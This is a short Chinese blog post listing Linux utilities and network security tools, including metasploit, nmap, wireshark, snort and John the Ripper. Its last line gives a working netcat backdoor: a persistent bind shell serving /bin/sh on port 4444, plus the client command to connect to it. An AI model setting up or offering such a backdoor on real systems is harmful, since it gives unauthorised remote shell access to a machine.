一些有用的工具列表 ( by quqi99 )
工欲善其事,必先利其器。综合应用一些工具,可以会加速你所做的事情,同时也会令你产生一些新的idea。先列在这里,有时间再选择某些好玩的工具挨个熟悉了。
Gentoo, 如何定制linux的文档,还有叫"Linux sea"的一本书, http://www.gentoo.org/doc/zh_cn/handbook/handbook-x86.xml?full=1
mkisofs, 制作iso
guestfish, 可以静态地直接对虚拟机镜像里的文件进行操作
kvm agent, 可以运行时地对虚拟机里的文件进行操作,如直接读取/proc里的文件获取正在运行虚拟的监控参数。
memhog,查看内存
iozone, 查看IO
cpuhog, 查看 cpu利用率
kudzu, linux中检测硬件变化的服务
我不是黑客,但我一直有这样一个看法:黑客=理解网络核心思想+熟练应用一些工具。低级一点的黑客,可能都不用怎么熟悉网络原理,把现成的各种小工具直接拿过来用集成在一块就能搞点小破坏了。所以精通网络原理是根本,会使用一些工具更能锦上添花。下面列一些工具:
网络渗透攻击工具:metasploit
控制命令服务:netcat
蜜罐主机上的监控工具,sebek
蜜罐网关,Roo
开源探测和审计工具,nmap
有线嗅探工具,topolump
无线嗅探工具,kismet
内核抓包用的API, libpcap,
更适合人读的网络协议分析工具,wireshark,
开源入侵检测系统,snort
创建tcp/udp/ip报文的,netwox, 有了它就可以伪造报文了
破解/etc/passwd密码文件的,John the Ripper
开源反病毒引擎,clamAV
二进制读取工具,binutils
后门,如ssh, netcat等, netcat使用,服务端:nohup nc -l -p 4444 -nvv -e /bin/sh &, 客户端:nc -nvv <IP> 4444